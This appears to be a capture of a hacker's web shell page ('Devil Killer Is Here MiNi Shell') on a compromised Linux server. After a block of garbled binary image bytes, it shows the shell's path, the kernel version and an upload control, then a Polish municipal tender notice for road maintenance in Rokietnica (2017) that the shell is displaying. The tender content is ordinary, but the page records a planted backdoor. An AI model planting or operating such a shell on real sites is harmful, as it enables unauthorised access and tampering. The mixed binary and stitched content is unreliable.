JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170306/37327-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.rokietnica.pl' target='_blank'>http://bip.rokietnica.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 37327 - 2017
              z dnia 2017-03-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rokietnica: Bieżące utrzymanie dróg gminnych w 2017 roku.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Rokietnica, krajowy numer identyfikacyjny
              , ul.
              ul. Golęcińska 
              1,
              62090  
              Rokietnica, woj.
              wielkopolskie, państwo
              Polska, tel.
              61 8960-600, e-mail
              halina.wroniecka@rokietnica.pl, faks
              61 8145-082.
              <br />
              Adres strony internetowej (URL): www.rokietnica.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />bip.rokietnica.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />62-090 Rokietnica ul. Golęcińska 1, Urząd Gminy w Rokietnicy</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Bieżące utrzymanie dróg gminnych w 2017 roku.<br /><b>Numer referencyjny: </b>ZP.271.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest wykonanie w generalnym wykonawstwie, zgodnie ze sztuka budowlaną, Polskimi Normami, Specyfikacją Istotnych Warunków Zamówienia oraz zasadami bezpieczeństwa dla korzystających z drogi, robót polegających na całorocznym bieżącym utrzymaniu dróg gminnych 
na terenie Gminy Rokietnica, które będą wykonywane jako zamówienie publiczne o wartości powyżej 30 000 EURO.
Wymagania techniczne wykonania i odbioru przedmiotu zamówienia określone zostały w Specyfikacjach Technicznych Wykonania i Odbioru Robót budowlanych stanowiących załącznik nr 8 do SIWZ.
Przed złożeniem oferty należy zapoznać się ze wszystkimi dostępnymi materiałami związanymi z tematem zamówienia.

Zakresy szczegółowe robót dla poszczególnych zadań

Zadanie 1
Równanie dróg gruntowych z zagęszczeniem  90.000 m2
- wyrównanie za pomocą równiarki wybojów, kolein i wgłębień gruntem tego samego rodzaju co pozostała część nawierzchni, pochodzącym ze ścięcia wygórowań powstałych z materiału wyniesionego z wybojów przez koła pojazdów w czasie suchej pogody oraz z nierównomiernego zagęszczenia jezdni, przy zachowaniu istniejącego profilu poprzecznego i podłużnego drogi 
- zagęszczenie wyrównanego odcinka drogi walcem samojezdnym ogumionym lub stalowym

Zadanie 2
Profilowanie dróg gruntowych z zagęszczeniem  32.000 m2
- wytyczenie robót kierunkowo i wysokościowo oraz oznaczenie ich w terenie za pomocą palików
- spulchnienie twardych gruntów zrywarką
- wyrównanie drogi poprzez przemieszczenie gruntu w przekroju poprzecznym, jak i w przekroju podłużnym w celu nadanie jej prawidłowego kształtu w przekroju poprzecznym i podłużnym, zapewniającym szybki spływ wód opadowych i osuszenie części jezdnej drogi
- zagęszczenie górnych warstw części jezdnej drogi walcem samojezdnym ogumionym lub stalowym

Zadanie 3
Utwardzanie drogi gruntowej tłuczniem z materiału wykonawcy z korytowaniem, warstwą grubości 20cm- 500m2
- wytyczenie robót kierunkowo i wysokościowo oraz oznaczenie ich w terenie za pomocą palików
- wykonanie koryta na głębokość 20 cm w stosunku do niwelety zjazdów i studni kanalizacyjnych z odwozem materiału
- profilowanie i dogęszczenie podłoża
- zakup, dowóz i ułożenie w-wy tłucznia z recyklingu gruzu betonowego sortowanego o uziarnieniu 40-80 mm warstwą grubości 15 cm
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze min. 8 ton
- ułożenie w-wy tłucznia z recyklingu gruzu betonowego sortowanego o uziarnieniu 10-40 mm warstwą grubości 5 cm
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze min. 8 ton
- uzupełnienie i profilowanie poboczy gruntem z koryta z zagęszczeniem

Zadanie 4
Utwardzenie drogi gruntowej materiałem zleceniodawcy z korytowaniem, warstwą grubości 20 cm-450m2
Zakres robót do wykonania jak w zadaniu 3 bez kosztów zakupu tłucznia z załadunkiem i dowozem 
z odległości do 5km 

Zadanie 5
Utwardzenie drogi gruntowej tłuczniem - materiałem wykonawcy, z wyrównaniem podłoża, warstwą grubości 10 cm  600m2
- profilowanie i dogęszczenie podłoża
- zakup, dowóz i ułożenie warstwy tłucznia z recyklingu gruzu betonowego sortowanego o uziarnieniu 
0-50mm warstwą grubości 10cm po zagęszczeniu
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze 8t
- uzupełnienie i wyprofilowanie poboczy gruntem uzyskanym z profilowania podłoża

Zadanie 6
Utwardzenie drogi gruntowej tłuczniem - materiałem Zamawiającego, z wyrównaniem podłoża, warstwą grubości 10 cm  550m2
- profilowanie i dogęszczenie podłoża
- dowóz (z odległości do 5km) i ułożenie warstwy tłucznia z recyklingu gruzu betonowego sortowanego 
o uziarnieniu 0-50mm warstwą grubości 10cm po zagęszczeniu
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze 8t
- uzupełnienie i wyprofilowanie poboczy gruntem uzyskanym z profilowania podłoża

Zadanie 7
Ułożenie nawierzchni tłucznia naturalnego łamanego o frakcji 0-31,5mm - z wyrównaniem podłoża, warstwą grubości 8 cm  250m2
- profilowanie i dogęszczenie podłoża
- zakup, dowóz i ułożenie warstwy tłucznia (granit/ gabro/ melafir) o uziarnieniu 0-31,5mm warstwą grubości 8cm po zagęszczeniu
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze 8t
- uzupełnienie i wyprofilowanie poboczy gruntem uzyskanym z profilowania podłoża

Zadanie 8
Naprawa drogi gruntowej materiałem kamiennym  3.700m2
- wypełnienie ubytków w nawierzchni gruntowej tłuczniem z recyklingu gruzu betonowego sortowanego 
o uziarnieniu 40-80mm do wysokości 5cm poniżej niwelety istniejącej nawierzchni gruntowej
- ułożenie warstwy tłucznia z recyklingu gruzu betonowego sortowanego o uziarnieniu 10-40mm do poziomu niwelety istniejącej nawierzchni gruntowej
- zagęszczenie tłucznia ciężkim walcem stalowym wibracyjnym o ciężarze 8t

Zadanie 9
Naprawa nawierzchni tłuczniowej uszkodzonej w ponad 25% powierzchni odcinka wymagającego naprawy  głębokość ubytków do 15cm  33.000m2
- rozłożenie na naprawianym odcinku nawierzchni mieszanki tłuczniowej w ilości gwarantującej wypełnienie wszystkich ubytków (rodzaj i uziarnienie mieszanki tłuczniowej jak w naprawianej górnej warstwie) 
- mechaniczne nagarnięcie mieszanki tłuczniowej w miejsca ubytków
- usunięcie nadmiaru mieszanki tłuczniowej
- zagęszczenie stalowym wibracyjnym o ciężarze 8 t

Zadanie 10
Naprawa pojedynczych uszkodzeń nawierzchni tłuczniowej o powierzchni do 5 m2   - 300m2         
- wyrównanie terenu przeznaczonego do remontu  mechanicznie
- oczyszczenie naprawianego miejsca  mechanicznie
- wypełnienie naprawianego miejsca kruszywem
- mechanicznie zagęszczenie (zagęszczarką płytową  lub walcem stalowym)

Zadanie 11
Remont cząstkowy nawierzchni asfaltowych  wykonywany mieszanką mineralno-asfaltową na gorąco z zacięciem krawędzi -250m2
- obcięcie krawędzi uszkodzenia na głębokości najgłębszego uszkodzenia umożliwiającą wyrównanie jego dna, nadając uszkodzeniu kształt prostej figury geometrycznej o pionowych kształtach
- usunięcie (wyrównanie lub wyfrezowanie) uszkodzonych fragmentów nawierzchni
- usuniecie wody, doprowadzając uszkodzone miejsca do stanu powierzchniowo-suchego
- dokładne oczyszczenie dna i krawędzi uszkodzonego miejsca z luźnych ziaren grysu, żwiru, piasku i pyłu
- spryskanie dna i boków naprawianego miejsca szybkorozpadową kationową emulsją asfaltową
- rozłożenie mieszanki mineralno-asfaltowej przy pomocy łopat i listwowych ściągaczek oraz listew profilowych
- dokładne zagęszczenie wbudowanego materiału walcem lub zagęszczarką płytową
- uszczelnienie od góry starej i nowej nawierzchni emulsją asfaltową i zasypanie drobnym kruszywem bazaltowym
- uprzątnięcie remontowanego miejsca z niewykorzystanego rumoszu oraz innych nieczystości
Materiał Wykonawcy jest materiałem nowym, na który Wykonawca dostarcza świadectwa jakości  zabrania się pozyskiwania masy bitumicznej z recyklingu

Zadanie 12
Remont cząstkowy nawierzchni asfaltowych  wykonywany mieszanką mineralno-asfaltową na gorąco bez zacięcia krawędzi -150m2
- usuniecie wody, doprowadzając uszkodzone miejsca do stanu powierzchniowo-suchego
- dokładne oczyszczenie dna i krawędzi uszkodzonego miejsca z luźnych ziaren grysu, żwiru, piasku i pyłu
- spryskanie dna i boków naprawianego miejsca szybkorozpadową kationową emulsją asfaltową
- rozłożenie mieszanki mineralno-asfaltowej przy pomocy łopat i listwowych ściągaczek oraz listew profilowych
- dokładne zagęszczenie wbudowanego materiału walcem lub zagęszczarką płytową
- uszczelnienie od góry starej i nowej nawierzchni emulsją asfaltową i zasypanie drobnym kruszywem bazaltowym
- uprzątnięcie remontowanego miejsca z niewykorzystanego rumoszu oraz innych nieczystości
Materiał Wykonawcy jest materiałem nowym, na który Wykonawca dostarcza świadectwa jakości  zabrania się pozyskiwania masy bitumicznej z recyklingu

Zadanie 13
Remont cząstkowy  pojedynczych głębokich wybojów o powierzchni do 5 m2 w nawierzchni z destruktu asfaltowego za pomocą destruktu asfaltowego ułożonego na spryskanym emulsją asfaltową podłożu z powierzchniowym zamknięciem emulsją asfaltową i grysem  200m2
 -oczyszczenie podłoża z luźnego kruszywa, piasku
- skropienie podłoża emulsją asfaltową szybkorozpadową
- ułożenie warstwy destruktu asfaltowego do poziomu nawierzchni
- dokładne zagęszczenie wbudowanej warstwy walcem lub zagęszczarką płytową
- wykonanie powierzchniowego utrwalenia naprawianego miejsca

Zadanie 14
Remont cząstkowy nawierzchni asfaltowych wykonywany emulsją asfaltową i grysem bazaltowym 2-5 mm warstwą grubości 2-4cm  250m2
- oczyszczenie naprawianego miejsca sprężonym powietrzem
- spryskanie uszkodzeń warstwą emulsji asfaltowej
- przy pomocy remontera, natryskującego pod ciśnieniem jednocześnie kruszywo wymieszane w dyszy urządzenia z modyfikowaną kationową emulsją asfaltową, uzupełnienie naprawianego miejsca otoczonym emulsją kruszywem
- w końcowej fazie uzupełniania należy zastosować natrysk naprawianego miejsca suchym kruszywem
W zależności od tekstury naprawianej nawierzchni należy zastosować odpowiednie uziarnienie grysu ( 2-5 mm)

Zadanie 15
Remont cząstkowy nawierzchni asfaltowych wykonywany emulsją asfaltową i grysem bazaltowym 2-5 mm warstwą grubości do 2cm  370m2
- oczyszczenie naprawianego miejsca sprężonym powietrzem
- spryskanie uszkodzeń warstwą emulsji asfaltowej
- przy pomocy remontera, natryskującego pod ciśnieniem jednocześnie kruszywo wymieszane w dyszy urządzenia z modyfikowaną kationową emulsją asfaltową, uzupełnienie naprawianego miejsca otoczonym emulsją kruszywem
- w końcowej fazie uzupełniania należy zastosować natrysk naprawianego miejsca suchym kruszywem
W zależności od tekstury naprawianej nawierzchni należy zastosować odpowiednie uziarnienie grysu ( 2-5 mm)

Zadanie 16
Wykonanie koryta na głębokość 8cm z odwozem lub przemieszczeniem urobku oraz wyprofilowaniem i zagęszczeniem podłoża -350m2
- wytyczenie robót kierunkowo i wysokościowo oraz oznaczenie ich w terenie za pomocą palików,
- wykonanie koryta na głębokość 8cm w stosunku do założonej niwelety przewidzianej do ułożenia nawierzchni
- profilowanie i dogęszczenie podłoża

Zadanie 17
Ułożenie nawierzchni asfaltowej na zjazdach warstwą o łącznej gr. 8 cm  z  przygotowaniem i spryskaniem emulsją asfaltową podłoża -100m2
- wyrównanie i dogęszczenie podłoża
- spryskanie emulsją asfaltową  kationową szybkorozpadową
- mechaniczne (układarką) lub ręczne rozłożenie warstwy wiążącej gr. 4 cm z mieszanki asfaltowej 
o uziarnieniu 0-16 mm
- zagęszczenie walcem stalowym wibracyjnym
- skropienie w-wy wiążącej emulsją asfaltową kationową szybkorozpadową
- mechaniczne (układarką) lub ręczne rozłożenie warstwy ścieralnej gr. 4 cm z mieszanki asfaltowej 
o uziarnieniu 0-11 mm
- zagęszczenie walcem stalowym wibracyjnym
- zagęszczenie walcem samojezdnym
                                               
Zadanie 18
Ułożenie nawierzchni z destruktu asfaltowego warstwą gr. 8 cm z przygotowaniem i spryskaniem emulsją asfaltową podłoża -300m2
- wyrównanie i dogęszczenie podłoża
- spryskanie emulsją asfaltową  kationową szybkorozpadową
- mechaniczne rozłożenie destruktu asfaltowego  warstwą gr. 8 cm 
- zagęszczenie walcem samojezdnym
- przygotowanie powierzchni pod pojedyncze powierzchniowe utrwalenie nawierzchni z destruktu asfaltowego emulsją asfaltową i grysami

Zadanie 19
Pojedyncze powierzchniowe utrwalenie nawierzchni bitumicznej i nawierzchni z destruktu asfaltowego emulsją asfaltową i grysami  500m2
- oznakowanie robót
- oczyszczenie starej nawierzchni bitumicznej lub wyrównanie i dogęszczenie nowej nawierzchni z destruktu asfaltowego
- spryskanie powierzchni emulsja asfaltową
- rozłożenie kruszywa  grysu bazaltowego płukanego o uziarnieniu 2-5mm
- zagęszczenie walcem samojezdnym
- pielęgnacja nawierzchni (uzupełnianie spadów kruszywa w dni słoneczne)

Zadanie 20
Remont nawierzchni z destruktu asfaltowego z licznymi wybojami  poprzez sfrezowanie całej uszkodzonej powierzchni, uzupełnienie górnej warstwy nowym destruktem asfaltowym warstwą gr. 4 cm, zagęszczenie ciężkim walcem stalowym i wykonanie powierzchniowego utrwalenia emulsją asfaltową i grysem  500m2 
- oznakowanie robót
- frezowanie uszkodzonej nawierzchni
- uzupełnienie warstwy nowym destruktem asfaltowym warstwą grubości 4cm
- zagęszczenie ciężkim walcem stalowym
- przygotowanie powierzchni i wykonanie pojedynczego powierzchniowego utrwalenia nawierzchni emulsją asfaltową i grysami.

Zadanie 21
Ścinka i profilowanie poboczy gruntowych warstwą gr 10cm w celu szybkiego odpływu wód deszczowych (załadunek, wywóz do 5km i utylizacja urobku)  200m2
- oznakowanie robót                         
- usunięcie z naprawianych miejsc  zanieczyszczeń
- wyznaczenie szerokości pobocza
- odwodnienie naprawionych powierzchni
- mechaniczne ścięcie pobocza z załadunkiem na środki transportowe
- zagęszczenie gruntu walcem samojezdnym
- oczyszczenie jezdni 

Zadanie 22
Ścinka i profilowanie poboczy gruntowych warstwą za każde dalsze 5cm grubości w celu szybkiego odpływu wód deszczowych (załadunek, wywóz do 5km i utylizacja urobku)  200m2
- oznakowanie robót                         
- usunięcie z naprawianych miejsc  zanieczyszczeń
- wyznaczenie szerokości pobocza
- odwodnienie naprawionych powierzchni
- mechaniczne ścięcie pobocza z załadunkiem na środki transportowe
- zagęszczenie gruntu walcem samojezdnym
- oczyszczenie jezdni 

Zadanie 23
Wykonanie rowków odpływowych w zawyżonych poboczach w miejscach pozwalających na szybki 
i skuteczny spływ wody z jezdni  przekrój trójkątny lub trapezowy  pow. 2-4m- 70 szt.
 - wyznaczenie miejsc w których istnieje doraźna potrzeba usunięcia lokalnych zastoisk wody
- wykonanie rowka w zawyżonych poboczach o głębokości dna równym głębokości zastoiska w najniższym punkcie przy użyciu oskardów i łopat lub mechanicznie koparką
Pochylenie minimum 1%. Przekrój poprzeczny rowka powinien być trójkątny lub trapezowy.

Zadanie 24
Wykonanie nawierzchni betonowej grubości 20cm z betonu C30/37 z przygotowaniem podłoża 
na podbudowie z kruszywa stabilizowanego mechanicznie  200m2
- wytyczenie robót kierunkowo i wysokościowo oraz oznaczenie ich w terenie za pomocą palików,
- wykonanie koryta na głębokość 30 cm w stosunku do założonej niwelety nawierzchni betonowej
- profilowanie i dogęszczenie podłoża
- ułożenie kruszywa stabilizowanego mechanicznie warstwą grubości 10cm z zagęszczeniem walcem stalowym lub zagęszczarką płytową
- ustawienie prowadnic przytwierdzonych do podłoża w sposób uniemożliwiający ich przemieszczenie 
i zapewniających ciągłość na złączach
Ustawienie prowadnic winno być takie żeby zapewniało uzyskanie na nawierzchni wymaganej niwelety 
i spadków poprzecznych i podłużnych
- dowóz betonomieszarką i wbudowanie mieszanki betonowej przy pomocy listwy wibracyjnej
- zabezpieczenie świeżego betonu przez skutkami szybkiego odparowania wody przez spryskanie preparatami pielęgnacyjnymi lub przykrycie folią
- wykonanie szczelin skurczowych pozornych przez nacięcie betonu piłami mechanicznymi do głębokości 1/3 grubości płyty
- wypełnienie szczelin masą zalewową na zimno lub gorąco
Zadanie 25
Roboty renowacyjne i utrzymaniowe w obrębie rowów przydrożnych  pogłębianie rowów 
z wyprofilowaniem dna i skarp, z wywozem nadmiaru gruntu  50m3
- ścięcie trawy i krzewów w obrębie planowanej renowacji rowu
- wyznaczenie planowanego zarysu przebiegu rowu w celu uzyskania kształtu trapezowego i zakładanego pochylenia podłużnego
- wykonanie robót ziemnych wg wskazanego zarysu z odwozem gruntu do miejsca utylizacji

Zadanie 26
Wykonanie nawierzchni z prefabrykowanych płyt drogowych żelbetowych pełnych z odzysku 
z przygotowaniem podłoża i umocnieniem poboczy tłuczniem (szer. 1,0m)  materiał Zamawiającego  90m2
- wykonanie koryta wraz z profilowaniem i zagęszczeniem podłoża na głębokość niezbędną do ułożenia płyt na podsypce cementowo  piaskowej gr 10cm na założonej niwelecie
- wykonanie podsypki cementowo-piaskowej gr.10cm
- załadunek, dowóz ze składowiska Zamawiającego (do 5km) i ułożenie płyt drogowych żelbetowych bezpośrednio ze środków transportowych
- wypełnienie spoin piaskiem drobnoziarnistym (szerokość spoin nie większa niż 10mm)
- obustronne umocnienie poboczy tłuczniem na szerokości 1m 

Zadanie 27
Remont cząstkowy /układanie nawierzchni z płyt betonowych  20m2
- wyznaczenie powierzchni zapadnięć i wybojów/uszkodzeń w nawierzchni
- rozebranie uszkodzonej/zapadniętej nawierzchni wraz z oczyszczeniem i posortowaniem materiału przeznaczonego do ponownego ułożenia
- naprawa podbudowy lub podłoża gruntowego w celu jego wzmocnienia
- ułożenie nawierzchni z płyt betonowych z wypełnieniem spoin zaprawą cementowa na głębokość 
nie mniejszą niż 2/3 wysokości płyty
- pielęgnacja nawierzchni

Zadanie 28
Budowa studzienki kanalizacji deszczowej z podłączeniem przykanalikiem fi 200 mm o długości 
do 10 m do studni na kolektorze kanalizacji deszczowej  2 szt.
- wykonanie wykopu pod studzienkę kanalizacji deszczowej i przykanalika
- montaż studzienki wpustowej
- ułożenie przykanalika wraz z włączeniem do istniejącej studni kanalizacji deszczowej
- zasypanie i zagęszczenie wykopu
- utwardzenie/ odtworzenie terenu wokół nowego wpustu

Zadanie 29
Regulacja pionowa włazów studzienek kanalizacyjnych i kratek wpustów ulicznych - 10 szt.                                                                                         - zdjęcie przykrycia (pokrywy, włazu, kratki ściekowej, nasady z wlewem bocznym) urządzenia podziemnego,
- rozebranie uszkodzonej nawierzchni wokół studzienki:
